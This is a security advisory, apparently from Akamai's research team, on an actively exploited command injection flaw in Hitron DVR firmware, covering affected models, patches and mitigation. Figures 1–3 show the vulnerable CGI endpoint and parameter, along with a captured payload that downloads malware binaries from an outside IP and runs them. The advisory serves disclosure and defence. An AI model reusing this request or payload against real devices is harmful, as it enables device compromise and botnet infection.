Need cloud computing? Get started now

Actively Exploited Vulnerability in Hitron DVRs: Fixed, Patches Available

Akamai Wave Blue

Written by

Aline Eliovich, Kyle Lefton, Chad Seaman, and Larry Cashdollar

January 30, 2024

Aline Eliovich

Written by

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

Akamai Wave Blue

Written by

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Chad Seaman headshot

Written by

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

As part of the InfectedSlurs discovery, the Akamai SIRT uncovered vulnerabilities in multiple Hitron DVR device models that are actively exploited in the wild.

Executive summary

Need to know

As part of the InfectedSlurs discovery, the Akamai SIRT uncovered vulnerabilities in multiple Hitron DVR device models that are actively exploited in the wild. Hitron devices are manufactured in South Korea by Hitron Systems.

The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. In its current configuration, it is utilizing device default credentials in the captured payloads.

The impacted devices and firmware versions are:

  • DVR HVR-4781: versions 1.03 through 4.02

  • DVR HVR-8781: versions 1.03 through 4.02

  • DVR HVR-16781: versions 1.03 through 4.02

  • DVR LGUVR-4H: versions 1.02 through 4.02

  • DVR LGUVR-8H: versions 1.02 through 4.02

  • DVR LGUVR-16H: versions 1.02 through 4.02

The vendor (Hitron Systems) has released new firmware versions to address the vulnerabilities. The vendor suggests upgrading to firmware version ≥ 4.03 for all impacted models as soon as possible. Advisories have also been published by CISA and KISA. KISA has also released advisories related to the individual CVEs, which can be found at the following links:

Exploitation observed

In late October 2023, Akamai SIRT analysts noticed a surge in activity to our honeypots that targeted a rarely abused TCP port. The probes were of low frequency and appeared to first attempt an authentication via a POST request to /cgi-bin/system_ntp.cgi (Figure 1) followed by a command injection exploitation attempt (Figure 2).  The devices targeted are Hitron Systems DVR devices that are vulnerable to RCE via command injection (Figure 3). Once authenticated, the attacker targets the command injection vulnerability in the timeserver parameter via a POST request to /cgi-bin/system_ntp.cgi.

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

Fig. 1: Authentication attempt

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE 
  PAYLOAD]&interval=60&enableNTPServer=1

Fig. 2: Exploitation attempt

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

Fig. 3: Captured RCE payload

Protection

Hitron DVR users who are running devices that are impacted by this vulnerability should immediately upgrade to the latest available firmware versions (≥ 4.03) that fix the RCE vulnerability.  

Additionally, to protect against this and future threats, several security measures should be implemented. First, organizations and individuals using the affected devices should change default login credentials immediately to enhance security. Regular monitoring of network traffic and logs can aid in the early detection of suspicious activity. Timely installation of security patches and updates from the device manufacturer is crucial to address the identified vulnerability.

Collaboration with security researchers, threat intelligence providers, and industry peers can help you stay informed about emerging threats and vulnerabilities. Finally, maintaining an updated inventory of connected devices and implementing network segmentation can limit the potential impact of such attacks.

Conclusion

Addressing the security issues identified in the Hitron systems and associated devices requires a multifaceted approach, combining user awareness, prompt patching, proactive monitoring, and collaboration within the cybersecurity community. By taking these measures, organizations and individuals can significantly reduce the risks posed by the observed malicious activity.

Stay tuned

To keep up with threats and other findings by the SIRT and other Akamai security research groups, follow us on X (formerly Twitter) or check out our SIG hub.

The Akamai SIRT would like to thank the folks at CISA, US-CERT, and KISA for their assistance in reporting these vulnerabilities to the vendors.



Akamai Wave Blue

Written by

Aline Eliovich, Kyle Lefton, Chad Seaman, and Larry Cashdollar

January 30, 2024

Aline Eliovich

Written by

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

Akamai Wave Blue

Written by

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Chad Seaman headshot

Written by

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.